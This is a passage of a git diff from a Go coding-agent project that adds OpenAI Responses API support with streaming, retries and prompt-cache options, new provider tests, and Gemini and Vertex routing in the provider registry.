+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 200 {
 		t.Errorf("Input = %d, want 200", u.Input)
@@ -318,8 +516,8 @@ func TestOpenAICache_100Pct(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-3\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":500,\"completion_tokens\":4,\"total_tokens\":504,\"prompt_tokens_details\":{\"cached_tokens\":500}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.CacheRead != 500 {
 		t.Errorf("CacheRead = %d, want 500", u.CacheRead)
@@ -338,8 +536,8 @@ func TestOpenAICache_ProxyFirstChunkHasUsage(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-4\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}]}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 800 {
 		t.Errorf("Input = %d, want 800", u.Input)
@@ -360,8 +558,8 @@ func TestOpenAICache_ProxyFirstWinsOnConflict(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-5\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":999,\"completion_tokens\":99,\"total_tokens\":1098,\"prompt_tokens_details\":{\"cached_tokens\":800}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000 (first chunk wins)", u.Input)
@@ -387,8 +585,8 @@ func TestOpenAICache_ProxySplitUsage(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-6\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":0,\"completion_tokens\":0,\"total_tokens\":0,\"prompt_tokens_details\":{\"cached_tokens\":300}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 400 {
 		t.Errorf("Input = %d, want 400 (first chunk)", u.Input)
@@ -411,7 +609,8 @@ func TestOpenAIToolCall_MissingIDGetsFallback(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-tool-1\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"tool_calls\"}]}\n" +
 		"data: [DONE]\n"
 
-	events := chatAndCollect(t, newTestServer(t, sse))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	events := chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})})
 
 	var got *provider.ToolCallBlock
 	for _, e := range events {
@@ -433,3 +632,157 @@ func TestOpenAIToolCall_MissingIDGetsFallback(t *testing.T) {
 		t.Fatalf("ToolCall.Arguments = %q, want %q", string(got.Arguments), "{\"command\":\"echo hi\"}")
 	}
 }
+
+func TestOpenAIResponsesAPICompatDisablesOptionalParams(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	no := false
+	p := newMockOpenAIProvider(t, []*provider.Model{{
+		ID:        "responses-test",
+		Reasoning: true,
+		Compat: &provider.ModelCompat{
+			SupportsPromptCacheKey:   &no,
+			SupportsReasoningSummary: &no,
+		},
+	}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingHigh,
+		Abort:         make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if _, ok := raw["prompt_cache_key"]; ok {
+		t.Fatalf("prompt_cache_key present despite compat flag: %#v", raw)
+	}
+	reasoning, ok := raw["reasoning"].(map[string]any)
+	if !ok {
+		t.Fatalf("reasoning = %#v, want object", raw["reasoning"])
+	}
+	if _, ok := reasoning["summary"]; ok {
+		t.Fatalf("reasoning.summary present despite compat flag: %#v", reasoning)
+	}
+}
+
+func TestOpenAIResponsesAPILongCacheRetentionCompat(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	no := false
+	p := newMockOpenAIProvider(t, []*provider.Model{{
+		ID: "responses-test",
+		Compat: &provider.ModelCompat{
+			SupportsLongCacheRetention: &no,
+		},
+	}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+	p.SetResponsesConfig(config.ResponsesConfig{PromptCacheRetention: "24h"})
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "responses-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if raw["prompt_cache_key"] == "" {
+		t.Fatalf("prompt_cache_key missing: %#v", raw)
+	}
+	if _, ok := raw["prompt_cache_retention"]; ok {
+		t.Fatalf("prompt_cache_retention present despite compat flag: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPIPromptCacheCanBeDisabled(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	no := false
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "responses-test", Reasoning: true}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+	p.SetResponsesConfig(config.ResponsesConfig{PromptCacheEnabled: &no})
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingHigh,
+		Abort:         make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if _, ok := raw["prompt_cache_key"]; ok {
+		t.Fatalf("prompt_cache_key present despite disabled cache: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPINoReasoningWhenOff(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "responses-test", Reasoning: true}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingOff,
+		Abort:         make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if _, ok := raw["reasoning"]; ok {
+		t.Fatalf("reasoning present despite thinking off: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPIStreamFailure(t *testing.T) {
+	sse := "data: {\"type\":\"response.failed\",\"error\":{\"message\":\"bad request\"}}\n"
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	p.SetUseResponsesAPI(true)
+
+	events := chatAndCollect(t, p, provider.ChatParams{
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	})
+	for _, e := range events {
+		if e.Type == provider.StreamError {
+			if e.Error == nil || !strings.Contains(e.Error.Error(), "bad request") {
+				t.Fatalf("error = %v, want bad request", e.Error)
+			}
+			return
+		}
+	}
+	t.Fatal("missing StreamError event")
+}
diff --git a/internal/provider/openai/responses.go b/internal/provider/openai/responses.go
new file mode 100644
index 0000000..2920f1d
--- /dev/null
+++ b/internal/provider/openai/responses.go
@@ -0,0 +1,526 @@
+package openai
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/ua"
+)
+
+// responsesRequest represents the request body for OpenAI Responses API.
+type responsesRequest struct {
+	Model                string               `json:"model"`
+	Instructions         string               `json:"instructions,omitempty"`
+	Input                []responsesInputItem `json:"input"`
+	Tools                []responsesTool      `json:"tools,omitempty"`
+	MaxOutputTokens      int                  `json:"max_output_tokens,omitempty"`
+	Temperature          *float64             `json:"temperature,omitempty"`
+	TopP                 *float64             `json:"top_p,omitempty"`
+	Stream               bool                 `json:"stream"`
+	Reasoning            *responsesReasoning  `json:"reasoning,omitempty"`
+	ParallelToolCalls    *bool                `json:"parallel_tool_calls,omitempty"`
+	PromptCacheKey       string               `json:"prompt_cache_key,omitempty"`
+	PromptCacheRetention string               `json:"prompt_cache_retention,omitempty"`
+}
+
+type responsesReasoning struct {
+	Effort  string `json:"effort,omitempty"`
+	Summary string `json:"summary,omitempty"`
+}
+
+type responsesInputItem struct {
+	Type      string      `json:"type,omitempty"`
+	Role      string      `json:"role,omitempty"`
+	Content   interface{} `json:"content,omitempty"`
+	CallID    string      `json:"call_id,omitempty"`
+	Name      string      `json:"name,omitempty"`
+	Arguments string      `json:"arguments,omitempty"`
+	Output    string      `json:"output,omitempty"`
+}
+
+type responsesContentBlock struct {
+	Type     string `json:"type"`
+	Text     string `json:"text,omitempty"`
+	ImageURL string `json:"image_url,omitempty"`
+}
+
+type responsesTool struct {
+	Type        string          `json:"type"`
+	Name        string          `json:"name,omitempty"`
+	Description string          `json:"description,omitempty"`
+	Parameters  json.RawMessage `json:"parameters,omitempty"`
+}
+
+type responsesSSEEvent struct {
+	Type        string                    `json:"type"`
+	Delta       string                    `json:"delta,omitempty"`
+	ItemID      string                    `json:"item_id,omitempty"`
+	OutputIndex int                       `json:"output_index,omitempty"`
+	Item        *responsesOutputItem      `json:"item,omitempty"`
+	Response    *responsesCompletedObject `json:"response,omitempty"`
+	Error       *responsesError           `json:"error,omitempty"`
+}
+
+type responsesOutputItem struct {
+	ID        string `json:"id,omitempty"`
+	Type      string `json:"type,omitempty"`
+	CallID    string `json:"call_id,omitempty"`
+	Name      string `json:"name,omitempty"`
+	Arguments string `json:"arguments,omitempty"`
+}
+
+type responsesCompletedObject struct {
+	Status string          `json:"status,omitempty"`
+	Usage  *responsesUsage `json:"usage,omitempty"`
+	Error  *responsesError `json:"error,omitempty"`
+}
+
+type responsesError struct {
+	Message string `json:"message,omitempty"`
+	Code    string `json:"code,omitempty"`
+	Type    string `json:"type,omitempty"`
+}
+
+type responsesUsage struct {
+	InputTokens        int `json:"input_tokens"`
+	OutputTokens       int `json:"output_tokens"`
+	TotalTokens        int `json:"total_tokens"`
+	InputTokensDetails *struct {
+		CachedTokens int `json:"cached_tokens"`
+	} `json:"input_tokens_details,omitempty"`
+	OutputTokensDetails *struct {
+		ReasoningTokens int `json:"reasoning_tokens"`
+	} `json:"output_tokens_details,omitempty"`
+}
+
+func (p *Provider) chatResponses(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	ch := make(chan provider.StreamEvent, 100)
+
+	go func() {
+		defer close(ch)
+
+		if p.apiKey == "" {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("OPENAI_API_KEY not set")}
+			return
+		}
+
+		modelID := params.ModelID
+		if modelID == "" {
+			if len(p.Models()) > 0 {
+				modelID = p.Models()[0].ID
+			} else {
+				modelID = "gpt-4o"
+			}
+		}
+
+		maxTokens := params.MaxTokens
+		if maxTokens == 0 {
+			maxTokens = 16384
+		}
+		model := p.GetModel(modelID)
+
+		reqBody := responsesRequest{
+			Model:           modelID,
+			Instructions:    params.SystemPrompt,
+			Input:           p.convertResponsesInput(params),
+			Tools:           p.convertResponsesTools(params.Tools),
+			MaxOutputTokens: maxTokens,
+			Temperature:     params.Temperature,
+			TopP:            params.TopP,
+			Stream:          true,
+		}
+
+		if p.responsesConfig != nil && p.responsesConfig.promptCacheEnabled && supportsPromptCacheKey(model) {
+			reqBody.PromptCacheKey = p.responsesPromptCacheKey(modelID)
+			if supportsPromptCacheRetention(model) {
+				reqBody.PromptCacheRetention = p.responsesConfig.promptCacheRetention
+			}
+		}
+
+		if !p.disableReasoning && params.ThinkingLevel != provider.ThinkingOff && model != nil && model.Reasoning {
+			reqBody.Reasoning = &responsesReasoning{
+				Effort:  responsesReasoningEffort(params.ThinkingLevel),
+				Summary: p.responsesReasoningSummary(model),
+			}
+		}
+
+		body, err := json.Marshal(reqBody)
+		if err != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("marshal request: %w", err)}
+			return
+		}
+		if os.Getenv("VIBECODING_DEBUG") != "" {
+			fmt.Fprintf(os.Stderr, "[DEBUG] Responses request body: %s\n", string(body))
+		}
+
+		maxRetries := 0
+		baseDelayMs := 2000
+		if p.retryConfig != nil && p.retryConfig.Enabled {
+			maxRetries = p.retryConfig.MaxRetries
+			baseDelayMs = p.retryConfig.BaseDelayMs
+		}
+
+		for attempt := 0; attempt <= maxRetries; attempt++ {
+			if err := ctx.Err(); err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: err, StopReason: "aborted"}
+				return
+			}
+
+			req, err := http.NewRequestWithContext(ctx, "POST", p.baseURL+"/responses", bytes.NewReader(body))
+			if err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("create request: %w", err)}
+				return
+			}
+			req.Header.Set("Content-Type", "application/json")
+			req.Header.Set("Authorization", "Bearer "+p.apiKey)
+			req.Header.Set("Accept", "text/event-stream")
+			req.Header.Set("User-Agent", ua.ProviderUserAgent())
+
+			resp, err := p.client.Do(req)
+			if err != nil {
+				if attempt < maxRetries && provider.IsRetryable(err, 0) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err))}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send request: %w", err)}
+				return
+			}
+
+			if resp.StatusCode != http.StatusOK {
+				bodyBytes, _ := io.ReadAll(resp.Body)
+				resp.Body.Close()
+				if attempt < maxRetries && provider.IsRetryable(nil, resp.StatusCode) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(bodyBytes))))}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API error %d: %s", resp.StatusCode, string(bodyBytes))}
+				return
+			}
+
+			p.parseResponsesSSE(ctx, resp.Body, ch, params)
+			resp.Body.Close()
+			return
+		}
+
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("all %d retry attempts exhausted", maxRetries)}
+	}()
+
+	return ch
+}
+
+func (p *Provider) convertResponsesInput(params provider.ChatParams) []responsesInputItem {
+	items := make([]responsesInputItem, 0, len(params.Messages))
+	for _, msg := range params.Messages {
+		switch msg.Role {
+		case "toolResult":
+			items = append(items, responsesInputItem{Type: "function_call_output", CallID: msg.ToolCallID, Output: responseToolOutput(msg)})
+		case "assistant":
+			content := p.responsesMessageContent(msg, "output_text")
+			if content != nil {
+				items = append(items, responsesInputItem{Type: "message", Role: "assistant", Content: content})
+			}
+			for _, c := range msg.Contents {
+				if c.Type == "toolCall" && c.ToolCall != nil {
+					items = append(items, responsesInputItem{Type: "function_call", CallID: c.ToolCall.ID, Name: c.ToolCall.Name, Arguments: string(c.ToolCall.Arguments)})
+				}
+			}
+		default:
+			role := msg.Role
+			if role == "" {
+				role = "user"
+			}
+			content := p.responsesMessageContent(msg, "input_text")
+			items = append(items, responsesInputItem{Type: "message", Role: role, Content: content})
+		}
+	}
+	return items
+}
+
+func (p *Provider) responsesMessageContent(msg provider.Message, textType string) interface{} {
+	if len(msg.Contents) == 0 {
+		return []responsesContentBlock{{Type: textType, Text: msg.Content}}
+	}
+	blocks := make([]responsesContentBlock, 0, len(msg.Contents))
+	for _, c := range msg.Contents {
+		switch c.Type {
+		case "text":
+			blocks = append(blocks, responsesContentBlock{Type: textType, Text: c.Text})
+		case "image":
+			if c.Image != nil {
+				blocks = append(blocks, responsesContentBlock{Type: "input_image", ImageURL: fmt.Sprintf("data:%s;base64,%s", c.Image.MimeType, c.Image.Data)})
+			}
+		}
+	}
+	if len(blocks) == 0 && msg.Content != "" {
+		blocks = append(blocks, responsesContentBlock{Type: textType, Text: msg.Content})
+	}
+	return blocks
+}
+
+func responseToolOutput(msg provider.Message) string {
+	if msg.Content != "" || len(msg.Contents) == 0 {
+		return msg.Content
+	}
+	var parts []string
+	for _, c := range msg.Contents {
+		if c.Type == "text" && c.Text != "" {
+			parts = append(parts, c.Text)
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func (p *Provider) convertResponsesTools(tools []provider.ToolDefinition) []responsesTool {
+	result := make([]responsesTool, 0, len(tools))
+	for _, t := range tools {
+		if t.Kind == "hosted" {
+			toolType := provider.HostedWebSearchToolType(t.ProviderType, t.Name)
+			if toolType == "" {
+				continue
+			}
+			result = append(result, responsesTool{Type: toolType})
+			continue
+		}
+		result = append(result, responsesTool{Type: "function", Name: t.Name, Description: t.Description, Parameters: t.Parameters})
+	}
+	return result
+}
+
+func (p *Provider) parseResponsesSSE(ctx context.Context, body io.Reader, ch chan<- provider.StreamEvent, params provider.ChatParams) {
+	scanner := bufio.NewScanner(body)
+	scanner.Buffer(make([]byte, 1024*1024), 1024*1024)
+
+	var (
+		usage           *provider.Usage
+		stopReason      string
+		toolCallsByKey  = make(map[string]*provider.ToolCallBlock)
+		toolCallOrder   []string
+		argumentBuffers = make(map[string]*strings.Builder)
+	)
+
+	ch <- provider.StreamEvent{Type: provider.StreamStart}
+
+	for scanner.Scan() {
+		select {
+		case <-ctx.Done():
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+			return
+		case <-params.Abort:
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("aborted"), StopReason: "aborted"}
+			return
+		default:
+		}
+
+		line := scanner.Text()
+		if !strings.HasPrefix(line, "data: ") {
+			continue
+		}
+		data := strings.TrimPrefix(line, "data: ")
+		if data == "[DONE]" {
+			break
+		}
+
+		var event responsesSSEEvent
+		if err := json.Unmarshal([]byte(data), &event); err != nil {
+			continue
+		}
+
+		switch event.Type {
+		case "response.output_text.delta":
+			if event.Delta != "" {
+				ch <- provider.StreamEvent{Type: provider.StreamTextDelta, TextDelta: event.Delta}
+			}
+		case "response.reasoning_text.delta":
+			if !p.disableReasoning && event.Delta != "" {
+				ch <- provider.StreamEvent{Type: provider.StreamThinkDelta, ThinkDelta: event.Delta}
+			}
+		case "response.function_call_arguments.delta":
+			key := responsesToolKey(event.ItemID, event.OutputIndex)
+			if _, ok := argumentBuffers[key]; !ok {
+				argumentBuffers[key] = &strings.Builder{}
+			}
+			argumentBuffers[key].WriteString(event.Delta)
+		case "response.output_item.done":
+			if event.Item != nil && event.Item.Type == "function_call" {
+				key := responsesToolKey(event.Item.ID, event.OutputIndex)
+				tc := &provider.ToolCallBlock{ID: event.Item.CallID, Name: event.Item.Name, Arguments: json.RawMessage(event.Item.Arguments)}
+				if tc.ID == "" {
+					tc.ID = event.Item.ID
+				}
+				if tc.ID == "" {
+					tc.ID = "toolcall_" + strconv.Itoa(len(toolCallOrder))
+				}
+				if tc.Arguments == nil || len(tc.Arguments) == 0 {
+					if buf := argumentBuffers[key]; buf != nil {
+						tc.Arguments = json.RawMessage(buf.String())
+					}
+				}
+				if _, seen := toolCallsByKey[key]; !seen {
+					toolCallOrder = append(toolCallOrder, key)
+				}
+				toolCallsByKey[key] = tc
+			}
+		case "response.completed":
+			if event.Response != nil {
+				usage = convertResponsesUsage(event.Response.Usage)
+				stopReason = responseStopReason(event.Response.Status)
+				if event.Response.Error != nil {
+					ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("responses error: %s", event.Response.Error.Message), StopReason: "error"}
+					return
+				}
+			}
+		case "response.failed", "error":
+			if event.Error != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("responses error: %s", event.Error.Message), StopReason: "error"}
+				return
+			}
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("responses stream failed"), StopReason: "error"}
+			return
+		}
+	}
+
+	if err := scanner.Err(); err != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("stream read error: %w", err), StopReason: "error"}
+		return
+	}
+
+	for _, key := range toolCallOrder {
+		if tc := toolCallsByKey[key]; tc != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamToolCall, ToolCall: tc}
+		}
+	}
+	if usage != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamUsage, Usage: usage}
+	}
+	if stopReason == "" && len(toolCallOrder) > 0 {
+		stopReason = "tool_calls"
+	}
+	ch <- provider.StreamEvent{Type: provider.StreamDone, StopReason: stopReason}
+}
+
+func responsesToolKey(itemID string, outputIndex int) string {
+	if itemID != "" {
+		return itemID
+	}
+	return strconv.Itoa(outputIndex)
+}
+
+func convertResponsesUsage(u *responsesUsage) *provider.Usage {
+	if u == nil {
+		return nil
+	}
+	usage := &provider.Usage{Input: u.InputTokens, Output: u.OutputTokens, TotalTokens: u.TotalTokens}
+	if u.InputTokensDetails != nil {
+		usage.CacheRead = u.InputTokensDetails.CachedTokens
+	}
+	if u.OutputTokensDetails != nil {
+		usage.Reasoning = u.OutputTokensDetails.ReasoningTokens
+	}
+	return usage
+}
+
+func responsesReasoningEffort(level provider.ThinkingLevel) string {
+	switch level {
+	case provider.ThinkingOff:
+		return ""
+	case provider.ThinkingMinimal:
+		return "minimal"
+	case provider.ThinkingLow:
+		return "low"
+	case provider.ThinkingMedium:
+		return "medium"
+	case provider.ThinkingHigh:
+		return "high"
+	case provider.ThinkingXHigh:
+		return "high"
+	default:
+		return ""
+	}
+}
+
+func (p *Provider) responsesReasoningSummary(model *provider.Model) string {
+	if !supportsReasoningSummary(model) {
+		return ""
+	}
+	if p.responsesConfig == nil {
+		return "auto"
+	}
+	if p.responsesConfig.reasoningSummary == "none" || p.responsesConfig.reasoningSummary == "off" {
+		return ""
+	}
+	if p.responsesConfig.reasoningSummary != "" {
+		return p.responsesConfig.reasoningSummary
+	}
+	return "auto"
+}
+
+func (p *Provider) responsesPromptCacheKey(modelID string) string {
+	if p.responsesConfig == nil {
+		return ""
+	}
+	if p.responsesConfig.promptCacheKey != "" {
+		return p.responsesConfig.promptCacheKey
+	}
+	if modelID == "" {
+		return ""
+	}
+	return "vibecoding:" + strings.TrimPrefix(strings.TrimPrefix(p.baseURL, "https://"), "http://") + ":" + modelID
+}
+
+func supportsPromptCacheKey(model *provider.Model) bool {
+	if model != nil && model.Compat != nil && model.Compat.SupportsPromptCacheKey != nil {
+		return *model.Compat.SupportsPromptCacheKey
+	}
+	return true
+}
+
+func supportsPromptCacheRetention(model *provider.Model) bool {
+	if model != nil && model.Compat != nil && model.Compat.SupportsLongCacheRetention != nil {
+		return *model.Compat.SupportsLongCacheRetention
+	}
+	return true
+}
+
+func supportsReasoningSummary(model *provider.Model) bool {
+	if model != nil && model.Compat != nil && model.Compat.SupportsReasoningSummary != nil {
+		return *model.Compat.SupportsReasoningSummary
+	}
+	return true
+}
+
+func responseStopReason(status string) string {
+	switch status {
+	case "completed":
+		return "stop"
+	case "incomplete":
+		return "length"
+	case "failed":
+		return "error"
+	default:
+		return status
+	}
+}
diff --git a/internal/provider/registry.go b/internal/provider/registry.go
index 4a966f7..e445c70 100644
--- a/internal/provider/registry.go
+++ b/internal/provider/registry.go
@@ -103,6 +103,10 @@ func ResolveProvider(cfg *config.ProviderConfig) (Provider, error) {
 	switch resolved.API {
 	case "anthropic-messages":
 		return globalRegistry.Create("anthropic_compatible", cfg)
+	case "google-gemini":
+		return globalRegistry.Create("google-gemini", cfg)
+	case "google-vertex":
+		return globalRegistry.Create("google-vertex", cfg)
 	default: // "openai-chat" or empty
 		return globalRegistry.Create("openai_compatible", cfg)
 	}
diff --git a/internal/provider/registry_test.go b/internal/provider/registry_test.go
index afa1887..5114666 100644
--- a/internal/provider/registry_test.go
+++ b/internal/provider/registry_test.go
@@ -68,6 +68,8 @@ func TestVendorFromBaseURL(t *testing.T) {
 		{"https://api.together.xyz/v1", "together"},
 		{"https://api.groq.com/openai", "groq"},
 		{"https://api.fireworks.ai/inference", "fireworks"},
+		{"https://generativelanguage.googleapis.com/v1beta/models", "google-gemini"},
+		{"https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models", "google-vertex"},
 		{"https://unknown.example.com/v1", ""},
 		{"", ""},
 	}
diff --git a/internal/provider/types.go b/internal/provider/types.go
index a77a920..05589c1 100644
--- a/internal/provider/types.go
+++ b/internal/provider/types.go
@@ -112,6 +112,7 @@ func NewToolResultMessageWithContents(toolCallID, toolName, text string, content
 type Usage struct {
 	Input       int  `json:"input"`
 	Output      int  `json:"output"`
+	Reasoning   int  `json:"reasoning,omitempty"`
 	CacheRead   int  `json:"cacheRead"`
 	CacheWrite  int  `json:"cacheWrite"`
 	TotalTokens int  `json:"totalTokens"`
@@ -216,8 +217,10 @@ type Model struct {
 	Reasoning     bool         `json:"reasoning"` // supports extended thinking
 	Input         []string     `json:"input"`     // "text", "image"
 	Cost          ModelPricing `json:"cost"`
-	ContextWindow int          `json:"contextWindow"` // max context tokens
-	MaxTokens     int          `json:"maxTokens"`     // max output tokens
+	ContextWindow int          `json:"contextWindow"`         // max context tokens
+	MaxTokens     int          `json:"maxTokens"`             // max output tokens
+	Temperature   *float64     `json:"temperature,omitempty"` // nil = use API default
+	TopP          *float64     `json:"topP,omitempty"`        // nil = use API default
 	Compat        *ModelCompat `json:"compat,omitempty"`
 }
 
@@ -235,6 +238,8 @@ type ModelCompat struct {
 
 	SupportsCacheControlOnTools *bool `json:"supportsCacheControlOnTools,omitempty"`
 	SupportsLongCacheRetention  *bool `json:"supportsLongCacheRetention,omitempty"`
+	SupportsPromptCacheKey      *bool `json:"supportsPromptCacheKey,omitempty"`
+	SupportsReasoningSummary    *bool `json:"supportsReasoningSummary,omitempty"`
 	SendSessionAffinityHeaders  bool  `json:"sendSessionAffinityHeaders,omitempty"`
 
 	SupportsEagerToolInputStreaming *bool `json:"supportsEagerToolInputStreaming,omitempty"`
@@ -254,9 +259,13 @@ const (
 
 // ToolDefinition describes a tool available to the model.
 type ToolDefinition struct {
-	Name        string          `json:"name"`
-	Description string          `json:"description"`
-	Parameters  json.RawMessage `json:"parameters"` // JSON Schema
+	Name         string          `json:"name"`
+	Description  string          `json:"description"`
+	Parameters   json.RawMessage `json:"parameters"`     // JSON Schema
+	Kind         string          `json:"kind,omitempty"` // "function" (default) or "hosted"
+	Provider     string          `json:"provider,omitempty"`
+	ProviderType string          `json:"providerType,omitempty"`
+	Model        string          `json:"model,omitempty"`
 }
 
 // StreamEventType identifies the type of a streaming event.
@@ -295,6 +304,8 @@ type ChatParams struct {
 	SystemPrompt  string
 	ThinkingLevel ThinkingLevel
 	MaxTokens     int
